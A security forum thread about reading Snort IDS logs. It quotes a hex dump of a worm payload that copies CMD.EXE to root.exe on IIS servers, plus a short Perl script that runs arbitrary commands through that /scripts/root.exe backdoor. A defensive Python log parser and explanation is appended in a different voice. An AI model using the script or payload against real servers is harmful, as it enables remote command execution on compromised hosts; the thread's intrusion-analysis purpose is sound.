#1

> 04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
> TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
> ***A**** Seq: 0xD7D856CE Ack: 0xF3E3078 Win: 0x4470 TcpLen: 20
> 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C
> 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U
> F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat
> 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_
> 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E.
> E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u.
> FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy
> 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U..
> 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL
> 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc
> 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E....
> 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u
> BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct
> 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E
> A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u
> BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele
> 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E.....
> 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E..
> 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U..
> 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna
> 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E.....
> 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname..
> 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA
> 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u.
> FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3
> 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E.....
> 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx..
> 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i...
> 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4....
> C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t.
> C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................
> E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................
> E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ......
> FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................
> FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y..
> 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........
> 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t..
> 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U..
> BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD.
> 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj....
> 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr
> 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe...
> 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j..
> 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\
> 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\
> 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe..
> 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U...
> 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP.........
> FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@...
> 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L
> 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%).........
> 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................
> 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ...
> 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@..............
> 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@...
> 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................
> 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10  ...............
> 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0...
> 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................
> 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`..
> 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... ....
> 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@.............
> 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............
> 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@.....
> FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
> FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
> FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h
> D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @..
> 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @..
> 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1
> 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j
> 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2...
> 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h
> 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@.......
> 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h
> 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h....
> E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L
> 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h
> B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5.
> 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j
> 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@...
> 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........
> 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h.
> 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40  @.h.$@.j.U.5.$@
> 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@..
> C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff.
> 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217....
> 40 00 89 35 @..5
#2

CODE RED
**Snickers**
[code:1:505efea7a8]
#!/usr/bin/perl
use Socket;
$port="80";
#lets see if this is really vulnerable to this crap...
if ($#ARGV<1) {die "Usage: CodeGreen IP command\n";}
$host=$ARGV[0];
$target = inet_aton($host);
$command=$ARGV[1];
print "Executing [$command] on $host";
$command=~s/ /%20/g;
my @results=sendraw("GET /scripts/root.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;

sub sendraw {
  # this saves the whole transaction anyway
  my ($pstr)=@_;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') ||0) || die("Socket problems");
  if(connect(S,pack "SnA4x8",2,$port,$target)){
    my @in;
    select(S); $|=1; print $pstr;
    while(<S>){ push @in, $_;}
    select(STDOUT); close(S);
    return @in;
  } else { die("Can't connect..."); }
}
[/code:1:505efea7a8]
#3

hehe, yup, easy one that everyone sees every day I'm sure =)
#4

actually since I'm on port 81 I don't see it at all.. I just did a Google search for d:\inetpub\scripts\root.exe
#5

Google rules
#6

Alright. Let me ask some questions.
First, is that a Snort log? Second, when you are breaking down these logs, what do you look for? I am very curious and want to learn how to break down IDS logs so I can see what is happening. Anyone care to bring me up to speed?
Tarballed
#7

I can't, but would like to second that motion of education. I want some too ;D I just have a godzillion of these gut feelings (some right, some wrong, some are to have a beer) that I just go with.
#8

Ok, when I get home from work tonight I'll take an example packet and try to go through the process of figuring out what's going on.
#9

Ok, sorry it's taken me a couple of days to post again.... was trying to find an easy sample to explain, but then decided to do something a little different
http://project.honeynet.org/scans/scan23/ The Honeynet Project has challenges to decode captures and figure out what happened in the traces. This is the Beginners Challenge. You all should check it out and try to solve it before looking at the solutions posted :roll:
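Post #6 asks what to look for when breaking down a log like the one in post #1. The script below is an added example, not code from any poster in this thread: it parses the Snort header lines and the hex/ASCII dump format shown above (tolerating the forum's `> ` quote prefix), records the endpoints, TTL and TCP flags, reassembles the payload bytes from the hex column, and pulls out the printable strings, which is how names like CloseHandle and _lcreat jump out of a dump without reading it byte by byte. The sample input is the header plus the first six payload lines of post #1's capture, embedded inline; the Packet class, the regular expressions and the `continuation` heuristic are assumptions of this example, not anything Snort itself provides.

```python
"""Read a Snort-style packet log (alert header lines followed by a hex/ASCII
dump) and pull out what an analyst looks at first: endpoints, TTL, TCP flags,
and the printable strings in the payload."""
import re
from dataclasses import dataclass

# Constructed sample input: the header and the first six payload lines of the
# capture quoted in post #1, with the forum's "> " quote prefix still attached.
SAMPLE_LOG = """\
> 04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
> TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
> ***A**** Seq: 0xD7D856CE Ack: 0xF3E3078 Win: 0x4470 TcpLen: 20
> 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C
> 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U
> F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat
> 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_
> 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E.
> E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u.
"""

# "<timestamp> [<tz>] <src>:<sport> -> <dst>:<dport>"
HEADER_RE = re.compile(r"^(\S+) (?:([A-Z]{3,4}) )?(\S+):(\d+) -> (\S+):(\d+)$")
# "TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF"
IP_RE = re.compile(r"^(TCP|UDP|ICMP) TTL:(\d+) .*?DgmLen:(\d+)")
# "***A**** Seq: 0x... Ack: 0x... Win: 0x... TcpLen: 20"
TCP_RE = re.compile(r"^([*A-Z12]{8}) Seq: (0x[0-9A-Fa-f]+) Ack: (0x[0-9A-Fa-f]+)")
# Leading run of up to 16 "HH " pairs; the ASCII column that follows is only a
# rendering of the same bytes, so it is ignored rather than parsed.
HEX_RE = re.compile(r"^((?:[0-9A-F]{2} ){1,16})")


@dataclass
class Packet:  # hypothetical container for this example
    timestamp: str = ""
    src: str = ""
    sport: int = 0
    dst: str = ""
    dport: int = 0
    proto: str = ""
    ttl: int = 0
    dgmlen: int = 0
    flags: str = ""
    payload: bytes = b""


def parse_snort_packet(text):
    """Parse one packet record; quote prefixes and blank lines are tolerated."""
    pkt = Packet()
    for raw in text.splitlines():
        line = raw.lstrip("> ").rstrip()
        if not line:
            continue
        if m := HEADER_RE.match(line):
            pkt.timestamp, _tz, pkt.src, sport, pkt.dst, dport = m.groups()
            pkt.sport, pkt.dport = int(sport), int(dport)
        elif m := IP_RE.match(line):
            pkt.proto, pkt.ttl, pkt.dgmlen = m.group(1), int(m.group(2)), int(m.group(3))
        elif m := TCP_RE.match(line):
            pkt.flags = m.group(1)
        elif m := HEX_RE.match(line):
            pkt.payload += bytes.fromhex(m.group(1))  # fromhex skips the spaces
    return pkt


def extract_strings(payload, min_len=4):
    """Return runs of printable ASCII of at least min_len bytes, like strings(1)."""
    found, run = [], bytearray()
    for b in payload:
        if 0x20 <= b <= 0x7E:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


HTTP_STARTS = (b"GET ", b"POST", b"HEAD", b"HTTP")


def summarize(text):
    """The first-pass questions: who, to where, which flags, what is inside."""
    pkt = parse_snort_packet(text)
    return {
        "flow": f"{pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport}",
        "flags": pkt.flags,
        "ttl": pkt.ttl,
        "payload_len": len(pkt.payload),
        "strings": extract_strings(pkt.payload),
        # ACK-only flags and no request line at the start of the data mean this
        # is a continuation segment: the request began in an earlier packet.
        "continuation": pkt.flags == "***A****"
        and not pkt.payload.startswith(HTTP_STARTS),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LOG).items():
        print(f"{key:>13}: {value}")
```

Reading the summary the way post #6 asks about: the flow line says who connected to whom and on which port; `***A****` with a DgmLen of 1500 means a full-size, ACK-only segment in the middle of an established stream, so the request line that started it is in an earlier packet; and a payload to port 80 whose strings are Win32 API and DLL names instead of HTTP headers tells you the segment is carrying binary, not a page request. Run the same parser over a normal web request and the strings column comes back full of `GET`, `Host:` and `User-Agent:` instead.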